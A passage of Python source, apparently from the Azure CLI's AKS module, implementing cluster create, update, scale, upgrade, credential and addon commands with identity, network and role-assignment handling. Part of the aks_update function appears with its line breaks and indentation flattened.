               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               outbound_type=None,
               enable_addons=None,
               workspace_resource_id=None,
               vnet_subnet_id=None,
               ppg=None,
               max_pods=0,
               min_count=None,
               max_count=None,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               zones=None,
               enable_node_public_ip=False,
               generate_ssh_keys=False,  # pylint: disable=unused-argument
               api_server_authorized_ip_ranges=None,
               enable_private_cluster=False,
               enable_managed_identity=True,
               assign_identity=None,
               attach_acr=None,
               enable_aad=False,
               aad_admin_group_object_ids=None,
               aci_subnet_name=None,
               appgw_name=None,
               appgw_subnet_cidr=None,
               appgw_id=None,
               appgw_subnet_id=None,
               appgw_watch_namespace=None,
               enable_sgxquotehelper=False,
               no_wait=False,
               yes=False):
    """Create a managed Kubernetes (AKS) cluster.

    Builds the ManagedCluster model from the CLI arguments (agent pool,
    network/AAD/identity/addon profiles), performs any required role
    assignments, and submits the create with retries for SPN replication
    latency. Returns the created cluster (or a poller when --no-wait).
    """
    _validate_ssh_key(no_ssh_key,
ssh_key_value)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)

    # default the cluster location to the resource group's location
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location

    vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
    load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)

    if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
        raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')

    agent_pool_profile = ManagedClusterAgentPoolProfile(
        name=_trim_nodepoolname(nodepool_name),  # Must be 12 chars or less before ACS RP adds to it
        tags=nodepool_tags,
        node_labels=nodepool_labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type="Linux",
        vnet_subnet_id=vnet_subnet_id,
        proximity_placement_group_id=ppg,
        availability_zones=zones,
        enable_node_public_ip=enable_node_public_ip,
        max_pods=int(max_pods) if max_pods else None,
        type=vm_set_type,
        mode="System"
    )
    if node_osdisk_size:
        agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)

    if node_osdisk_type:
        agent_pool_profile.os_disk_type = node_osdisk_type

    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count,
                                   node_count, agent_pool_profile)

    linux_profile = None
    # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
    if not no_ssh_key:
        ssh_config = ContainerServiceSshConfiguration(
            public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
        linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)

    windows_profile = None
    if windows_admin_username or windows_admin_password:
        # To avoid that windows_admin_password is set but windows_admin_username is not
        if windows_admin_username is None:
            try:
                from knack.prompting import prompt
                windows_admin_username = prompt('windows_admin_username: ')
                # The validation for admin_username in ManagedClusterWindowsProfile will fail even if
                # users still set windows_admin_username to empty here
            except NoTTYException:
                raise CLIError('Please specify username for Windows in non-interactive mode.')

        if windows_admin_password is None:
            try:
                windows_admin_password = prompt_pass(
                    msg='windows-admin-password: ', confirm=True)
            except NoTTYException:
                raise CLIError(
                    'Please specify both username and password in non-interactive mode.')

        windows_license_type = None
        if enable_ahub:
            windows_license_type = 'Windows_Server'

        windows_profile = ManagedClusterWindowsProfile(
            admin_username=windows_admin_username,
            admin_password=windows_admin_password,
            license_type=windows_license_type)

    # If customer explicitly provide a service principal, disable managed identity.
    if service_principal and client_secret:
        enable_managed_identity = False
    # Skip create service principal profile for the cluster if the cluster
    # enables managed identity and customer doesn't explicitly provide a service principal.
    service_principal_profile = None
    principal_obj = None
    if not(enable_managed_identity and not service_principal and not client_secret):
        principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
                                                      service_principal=service_principal,
                                                      client_secret=client_secret,
                                                      subscription_id=subscription_id,
                                                      dns_name_prefix=dns_name_prefix,
                                                      location=location, name=name)
        service_principal_profile = ManagedClusterServicePrincipalProfile(
            client_id=principal_obj.get("service_principal"),
            secret=principal_obj.get("client_secret"),
            key_vault_secret_ref=None)

    need_post_creation_vnet_permission_granting = False
    if (vnet_subnet_id and not skip_subnet_role_assignment and
            not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        # if service_principal_profile is None, then this cluster is an MSI cluster,
        # and the service principal does not exist. Two cases:
        # 1. For system assigned identity, we just tell user to grant the
        # permission after the cluster is created to keep consistent with portal experience.
        # 2. For user assigned identity, we can grant needed permission to
        # user provided user assigned identity before creating managed cluster.
        if service_principal_profile is None and not assign_identity:
            msg = ('It is highly recommended to use USER assigned identity '
                   '(option --assign-identity) when you want to bring your own'
                   'subnet, which will have no latency for the role assignment to '
                   'take effect. When using SYSTEM assigned identity, '
                   'azure-cli will grant Network Contributor role to the '
                   'system assigned identity after the cluster is created, and '
                   'the role assignment will take some time to take effect, see '
                   'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
                   'proceed to create cluster with system assigned identity?')
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            need_post_creation_vnet_permission_granting = True
        else:
            scope = vnet_subnet_id
            identity_client_id = ""
            if assign_identity:
                identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
            else:
                identity_client_id = service_principal_profile.client_id
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        identity_client_id, scope=scope):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')

    load_balancer_profile = create_load_balancer_profile(
        load_balancer_managed_outbound_ip_count,
        load_balancer_outbound_ips,
        load_balancer_outbound_ip_prefixes,
        load_balancer_outbound_ports,
        load_balancer_idle_timeout)

    if attach_acr:
        if enable_managed_identity:
            if no_wait:
                raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
                               '--no-wait is not allowed, please wait until the whole operation succeeds.')
            # Attach acr operation will be handled after the cluster is created
        else:
            _ensure_aks_acr(cmd.cli_ctx,
                            client_id=service_principal_profile.client_id,
                            acr_name_or_id=attach_acr,
                            subscription_id=subscription_id)

    outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id,
                                       load_balancer_sku, load_balancer_profile)

    network_profile = None
    if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
            docker_bridge_address, network_policy]):
        if not network_plugin:
            raise CLIError('Please explicitly specify the network plugin type')
        if pod_cidr and network_plugin == "azure":
            raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
        network_profile = ContainerServiceNetworkProfile(
            network_plugin=network_plugin,
            pod_cidr=pod_cidr,
            service_cidr=service_cidr,
            dns_service_ip=dns_service_ip,
            docker_bridge_cidr=docker_bridge_address,
            network_policy=network_policy,
            load_balancer_sku=load_balancer_sku.lower(),
            load_balancer_profile=load_balancer_profile,
            outbound_type=outbound_type
        )
    else:
        if load_balancer_sku.lower() == "standard" or load_balancer_profile:
            network_profile = ContainerServiceNetworkProfile(
                network_plugin="kubenet",
                load_balancer_sku=load_balancer_sku.lower(),
                load_balancer_profile=load_balancer_profile,
                outbound_type=outbound_type,
            )
        if load_balancer_sku.lower() == "basic":
            network_profile = ContainerServiceNetworkProfile(
                load_balancer_sku=load_balancer_sku.lower(),
            )

    addon_profiles = _handle_addons_args(
        cmd,
        enable_addons,
        subscription_id,
        resource_group_name,
        {},
        workspace_resource_id,
        aci_subnet_name,
        vnet_subnet_id,
        appgw_name,
        appgw_subnet_cidr,
        appgw_id,
        appgw_subnet_id,
        appgw_watch_namespace,
        enable_sgxquotehelper
    )
    monitoring = False
    if CONST_MONITORING_ADDON_NAME in addon_profiles:
        monitoring = True
        _ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])

    # addon is in the list and is enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled

    os_type = 'Linux'
    enable_virtual_node = False
    if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
        enable_virtual_node = True

    aad_profile = None
    if enable_aad:
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            raise CLIError('"--enable-aad" cannot be used together with '
                           '"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
        aad_profile = ManagedClusterAADProfile(
            managed=True,
            admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
            tenant_id=aad_tenant_id
        )
    else:
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
            # default the tenant to the currently-logged-in tenant
            if aad_tenant_id is None:
                profile = Profile(cli_ctx=cmd.cli_ctx)
                _, _, aad_tenant_id = profile.get_login_credentials()
            aad_profile = ManagedClusterAADProfile(
                client_app_id=aad_client_app_id,
                server_app_id=aad_server_app_id,
                server_app_secret=aad_server_app_secret,
                tenant_id=aad_tenant_id
            )

    api_server_access_profile = None
    if enable_private_cluster and load_balancer_sku.lower() != "standard":
        raise CLIError("Please use standard load balancer for private cluster")
    if api_server_authorized_ip_ranges or enable_private_cluster:
        api_server_access_profile = _populate_api_server_access_profile(
            api_server_authorized_ip_ranges,
            enable_private_cluster=enable_private_cluster
        )

    # Check that both --disable-rbac and --enable-rbac weren't provided
    if all([disable_rbac, enable_rbac]):
        raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')

    identity = None
    if not enable_managed_identity and assign_identity:
        raise ArgumentUsageError('--assign-identity can only be specified when --enable-managed-identity is specified')
    if enable_managed_identity and not assign_identity:
        identity = ManagedClusterIdentity(
            type="SystemAssigned"
        )
    elif enable_managed_identity and assign_identity:
        user_assigned_identity = {
            assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
        }
        identity = ManagedClusterIdentity(
            type="UserAssigned",
            user_assigned_identities=user_assigned_identity
        )

    mc = ManagedCluster(
        location=location, tags=tags,
        dns_prefix=dns_name_prefix,
        kubernetes_version=kubernetes_version,
        enable_rbac=not disable_rbac,
        agent_pool_profiles=[agent_pool_profile],
        linux_profile=linux_profile,
        windows_profile=windows_profile,
        service_principal_profile=service_principal_profile,
        network_profile=network_profile,
        addon_profiles=addon_profiles,
        aad_profile=aad_profile,
        auto_scaler_profile=cluster_autoscaler_profile,
        api_server_access_profile=api_server_access_profile,
        identity=identity,
        disk_encryption_set_id=node_osdisk_diskencryptionset_id
    )

    if uptime_sla:
        mc.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )

    # Add AAD session key to header.
    # If principal_obj is None, we will not add this header, this can happen
    # when the cluster enables managed identity. In this case, the header is useless
    # and that's OK to not add this header
    custom_headers = None
    if principal_obj:
        custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}

    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            need_pull_for_result = (monitoring or
                                    (enable_managed_identity and attach_acr) or
                                    ingress_appgw_addon_enabled or
                                    enable_virtual_node or
                                    need_post_creation_vnet_permission_granting)
            if need_pull_for_result:
                # adding a wait here since we rely on the result for role assignment
                result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
                    resource_group_name=resource_group_name,
                    resource_name=name,
                    parameters=mc))
            else:
                result = sdk_no_wait(no_wait,
                                     client.create_or_update,
                                     resource_group_name=resource_group_name,
                                     resource_name=name,
                                     parameters=mc,
                                     custom_headers=custom_headers)
            if monitoring:
                cloud_name = cmd.cli_ctx.cloud.name
                # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
                # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
                if cloud_name.lower() == 'azurecloud':
                    from msrestazure.tools import resource_id
                    cluster_resource_id = resource_id(
                        subscription=subscription_id,
                        resource_group=resource_group_name,
                        namespace='Microsoft.ContainerService',
                        type='managedClusters',
                        name=name
                    )
                    _add_monitoring_role_assignment(result, cluster_resource_id, cmd)
            if enable_managed_identity and attach_acr:
                # Attach ACR to cluster enabled managed identity
                if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
                    logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
                                   'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
                                   'in MC_ resource group to give it permission to pull from ACR.')
                else:
                    kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
                    _ensure_aks_acr(cmd.cli_ctx,
                                    client_id=kubelet_identity_client_id,
                                    acr_name_or_id=attach_acr,
                                    subscription_id=subscription_id)
            if ingress_appgw_addon_enabled:
                _add_ingress_appgw_addon_role_assignment(result, cmd)
            if enable_virtual_node:
                _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id)
            if need_post_creation_vnet_permission_granting:
                # newly created SYSTEM assigned identity needs Network Contributor on the subnet
                if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                               result.identity.principal_id, scope=vnet_subnet_id,
                                               resolve_assignee=False):
                    logger.warning('Could not create a role assignment for subnet. '
                                   'Are you an Owner on this subscription?')
            return result
        except CloudError as ex:
            retry_exception = ex
            if 'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception


def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable the given comma-separated addons on the managed cluster."""
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(
        cmd,
        instance,
        subscription_id,
        resource_group_name,
        name,
        addons,
        enable=False,
        no_wait=no_wait
    )

    # send the managed cluster representation to update the addon profiles
    return sdk_no_wait(no_wait, client.create_or_update,
                       resource_group_name, name, instance)


def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
                      subnet_name=None, appgw_name=None, appgw_subnet_cidr=None, appgw_id=None,
                      appgw_subnet_id=None, appgw_watch_namespace=None, enable_sgxquotehelper=False,
                      no_wait=False):
    """Enable the given comma-separated addons, then perform any role
    assignments the monitoring/ingress-appgw/virtual-node addons require."""
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons,
                              enable=True,
                              workspace_resource_id=workspace_resource_id,
                              subnet_name=subnet_name,
                              appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
                              appgw_id=appgw_id,
                              appgw_subnet_id=appgw_subnet_id,
                              appgw_watch_namespace=appgw_watch_namespace,
                              enable_sgxquotehelper=enable_sgxquotehelper,
                              no_wait=no_wait)

    enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
        and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled

    os_type = 'Linux'
    virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
                           instance.addon_profiles[virtual_node_addon_name].enabled)

    need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
    if need_pull_for_result:
        if enable_monitoring:
            _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])

        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))

        if enable_monitoring:
            cloud_name = cmd.cli_ctx.cloud.name
            # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
            if cloud_name.lower() == 'azurecloud':
                from msrestazure.tools import resource_id
                cluster_resource_id = resource_id(
                    subscription=subscription_id,
                    resource_group=resource_group_name,
                    namespace='Microsoft.ContainerService',
                    type='managedClusters',
                    name=name
                )
                _add_monitoring_role_assignment(result, cluster_resource_id, cmd)

        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(result, cmd)

        if enable_virtual_node:
            # All agent pool will reside in the same vnet, we will grant vnet level Contributor role
            # in later function, so using a random agent pool here is OK
            random_agent_pool = result.agent_pool_profiles[0]
            if random_agent_pool.vnet_subnet_id != "":
                _add_virtual_node_role_assignment(cmd, result, random_agent_pool.vnet_subnet_id)
            # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
            # we don't need to handle it in client side in this case.
    else:
        result = sdk_no_wait(no_wait, client.create_or_update,
                             resource_group_name, name, instance)
    return result


def aks_get_versions(cmd, client, location):
    """List Kubernetes orchestrator versions available for managed clusters in *location*."""
    return client.list_orchestrators(location, resource_type='managedClusters')


def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
                        path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
                        overwrite_existing=False, context_name=None):
    """Fetch cluster (user or admin) credentials and print or merge them into *path*."""
    credentialResults = None
    if admin:
        credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
    else:
        credentialResults = client.list_cluster_user_credentials(resource_group_name, name)

    if not credentialResults:
        raise CLIError("No Kubernetes credentials found.")
    try:
        kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
        _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")


def aks_list(cmd, client, resource_group_name=None):
    """List managed clusters in the resource group (or the whole subscription)."""
    if resource_group_name:
        managed_clusters = client.list_by_resource_group(resource_group_name)
    else:
        managed_clusters = client.list()
    return _remove_nulls(list(managed_clusters))


def aks_show(cmd, client, resource_group_name, name):
    """Return a single managed cluster with null-valued fields stripped."""
    mc = client.get(resource_group_name, name)
    return _remove_nulls([mc])[0]


def aks_update_credentials(cmd, client, resource_group_name, name,
                           reset_service_principal=False,
                           reset_aad=False,
                           service_principal=None,
                           client_secret=None,
                           aad_server_app_id=None,
                           aad_server_app_secret=None,
                           aad_client_app_id=None,
                           aad_tenant_id=None,
                           no_wait=False):
    """Reset either the cluster's service principal or its (legacy) AAD profile.

    Exactly one of --reset-service-principal / --reset-aad must be given.
    """
    if bool(reset_service_principal) == bool(reset_aad):
        raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
    if reset_service_principal:
        if service_principal is None or \
client_secret is None:
            raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
        return sdk_no_wait(no_wait,
                           client.reset_service_principal_profile,
                           resource_group_name,
                           name, service_principal, client_secret)
    if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
        raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
                       '--aad-server-app-secret SECRET [--aad-tenant-id ID]')
    parameters = {
        'clientAppID': aad_client_app_id,
        'serverAppID': aad_server_app_id,
        'serverAppSecret': aad_server_app_secret,
        'tenantID': aad_tenant_id
    }
    return sdk_no_wait(no_wait,
                       client.reset_aad_profile,
                       resource_group_name,
                       name, parameters)


def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
    """Scale the named node pool (or the sole pool) to *node_count* nodes.

    Raises CLIError for multi-pool clusters without an explicit pool name,
    for autoscaler-enabled pools, and for unknown pool names.
    """
    instance = client.get(resource_group_name, name)

    if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')

    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
            if agent_profile.enable_auto_scaling:
                raise CLIError("Cannot scale cluster autoscaler enabled node pool.")

            agent_profile.count = int(node_count)  # pylint: disable=no-member
            # null out the SP and AAD profile because otherwise validation complains
            instance.service_principal_profile = None
            instance.aad_profile = None
            return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))


# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None,
uptime_sla=False, load_balancer_managed_outbound_ip_count=None, load_balancer_outbound_ips=None, load_balancer_outbound_ip_prefixes=None, load_balancer_outbound_ports=None, load_balancer_idle_timeout=None, attach_acr=None, detach_acr=None, api_server_authorized_ip_ranges=None, enable_aad=False, aad_tenant_id=None, aad_admin_group_object_ids=None, enable_ahub=False, disable_ahub=False, no_wait=False): update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count, load_balancer_outbound_ips, load_balancer_outbound_ip_prefixes, load_balancer_outbound_ports, load_balancer_idle_timeout) update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None) # pylint: disable=too-many-boolean-expressions if (update_autoscaler != 1 and cluster_autoscaler_profile is None and not update_lb_profile and not attach_acr and not detach_acr and not uptime_sla and api_server_authorized_ip_ranges is None and not enable_aad and not update_aad_profile and not enable_ahub and not disable_ahub): raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or ' '"--disable-cluster-autoscaler" or ' '"--update-cluster-autoscaler" or ' '"--cluster-autoscaler-profile" or ' '"--load-balancer-managed-outbound-ip-count" or' '"--load-balancer-outbound-ips" or ' '"--load-balancer-outbound-ip-prefixes" or' '"--load-balancer-outbound-ports" or' '"--load-balancer-idle-timeout" or' '"--attach-acr" or "--detach-acr" or' '"--uptime-sla" or' '"--api-server-authorized-ip-ranges" or ' '"--enable-aad" or ' '"--aad-tenant-id" or ' '"--aad-admin-group-object-ids" or ' '"--enable-ahub" or ' '"--disable-ahub"') instance = client.get(resource_group_name, name) # For multi-agent pool, use the az aks nodepool command if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1: raise CLIError('There are more than one node pool in the cluster. 
Please use "az aks nodepool" command ' 'to update per node pool auto scaler settings') _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or update_cluster_autoscaler) if enable_cluster_autoscaler: if instance.agent_pool_profiles[0].enable_auto_scaling: logger.warning('Cluster autoscaler is already enabled for this node pool.\n' 'Please run "az aks --update-cluster-autoscaler" ' 'if you want to update min-count or max-count.') return None instance.agent_pool_profiles[0].min_count = int(min_count) instance.agent_pool_profiles[0].max_count = int(max_count) instance.agent_pool_profiles[0].enable_auto_scaling = True if update_cluster_autoscaler: if not instance.agent_pool_profiles[0].enable_auto_scaling: raise CLIError('Cluster autoscaler is not enabled for this node pool.\n' 'Run "az aks nodepool update --enable-cluster-autoscaler" ' 'to enable cluster with min-count and max-count.') instance.agent_pool_profiles[0].min_count = int(min_count) instance.agent_pool_profiles[0].max_count = int(max_count) if disable_cluster_autoscaler: if not instance.agent_pool_profiles[0].enable_auto_scaling: logger.warning('Cluster autoscaler is already disabled for this node pool.') return None instance.agent_pool_profiles[0].enable_auto_scaling = False instance.agent_pool_profiles[0].min_count = None instance.agent_pool_profiles[0].max_count = None # if intention is to clear autoscaler profile if cluster_autoscaler_profile == {}: instance.auto_scaler_profile = {} # else profile is provided, update instance profile if it exists elif cluster_autoscaler_profile: instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__, dict((key.replace("-", "_"), value) for (key, value) in cluster_autoscaler_profile.items())) \ if instance.auto_scaler_profile else cluster_autoscaler_profile subscription_id = get_subscription_id(cmd.cli_ctx) client_id = "" if instance.identity is not None and instance.identity.type == "SystemAssigned": if 
instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None: raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. ' 'Please do not set --attach-acr or --detach-acr. ' 'You can manually grant or revoke permission to the identity named ' '<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.') client_id = instance.identity_profile["kubeletidentity"].client_id else: client_id = instance.service_principal_profile.client_id if not client_id: raise CLIError('Cannot get the AKS cluster\'s service principal.') if attach_acr: _ensure_aks_acr(cmd.cli_ctx, client_id=client_id, acr_name_or_id=attach_acr, subscription_id=subscription_id) if detach_acr: _ensure_aks_acr(cmd.cli_ctx, client_id=client_id, acr_name_or_id=detach_acr, subscription_id=subscription_id, detach=True) if uptime_sla: instance.sku = ManagedClusterSKU( name="Basic", tier="Paid" ) if update_lb_profile: instance.network_profile.load_balancer_profile = update_load_balancer_profile( load_balancer_managed_outbound_ip_count, load_balancer_outbound_ips, load_balancer_outbound_ip_prefixes, load_balancer_outbound_ports, load_balancer_idle_timeout, instance.network_profile.load_balancer_profile) # empty string is valid as it disables ip whitelisting if api_server_authorized_ip_ranges is not None: instance.api_server_access_profile = \ _populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance) if enable_aad: if instance.aad_profile is not None and instance.aad_profile.managed: raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled') instance.aad_profile = ManagedClusterAADProfile( managed=True ) if update_aad_profile: if instance.aad_profile is None or not instance.aad_profile.managed: raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"' ' if managed AAD is not enabled') if aad_tenant_id is not None: instance.aad_profile.tenant_id = aad_tenant_id if aad_admin_group_object_ids is 
not None:
            instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)

    # Azure Hybrid User Benefit toggles for Windows node pools (tail of aks_update).
    if enable_ahub and disable_ahub:
        raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')

    if enable_ahub:
        instance.windows_profile.license_type = 'Windows_Server'
    if disable_ahub:
        instance.windows_profile.license_type = 'None'

    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)


# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd, client, resource_group_name, name,
                kubernetes_version='',
                control_plane_only=False,
                node_image_only=False,
                no_wait=False,
                yes=False):
    """Upgrade a managed cluster's Kubernetes version and/or node image.

    Prompts for confirmation unless --yes. Legacy clusters (max_agent_pools < 8
    or availability-set based) always upgrade node pools together with the
    control plane; otherwise --control-plane-only limits the upgrade scope.
    --node-image-only upgrades every node pool's image without a version change.
    """
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None

    instance = client.get(resource_group_name, name)

    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break

    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        msg = "This node image upgrade operation will run across every node pool in the cluster" \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        for agent_pool_profile in instance.agent_pool_profiles:
            if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied on VirtualMachineScaleSets cluster.')
            _upgrade_single_nodepool_image_version(True, client, resource_group_name, name, agent_pool_profile.name)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]

    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)

    upgrade_all = False
    instance.kubernetes_version = kubernetes_version

    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None

    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)


def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    """Kick off a node-image-only upgrade for one node pool."""
    return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)


# Coordinates of the Azure Dev Spaces CLI extension used by the helpers below.
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'


def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
                       endpoint_type='Public', prompt=False):
    """
    Use Azure Dev Spaces with a managed Kubernetes cluster.

